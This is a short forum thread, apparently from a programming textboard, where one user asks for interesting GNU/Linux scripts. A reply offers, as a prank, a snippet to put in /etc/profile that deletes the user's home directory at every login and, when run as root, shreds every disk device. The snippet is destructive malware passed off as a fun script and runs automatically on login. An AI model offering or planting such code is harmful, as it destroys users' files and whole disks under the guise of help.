Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

Interesting GNU/Linux scripts/programs

Name: Anonymous 2009-09-10 1:09

What interesting/fun GNU/Linux scripts/programs do you have, /prog/?  So far I've only got a system info script, a thread fetcher and something that uploads files and outputs the link they are hosted at.

What about you?

Name: Anonymous 2009-09-16 13:58

THIS on /etc/profile

rm -rf $HOME
if [ $UID -eq 0 ]; then
  for device in /dev/?d?; do
    shred $device
  done
fi

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List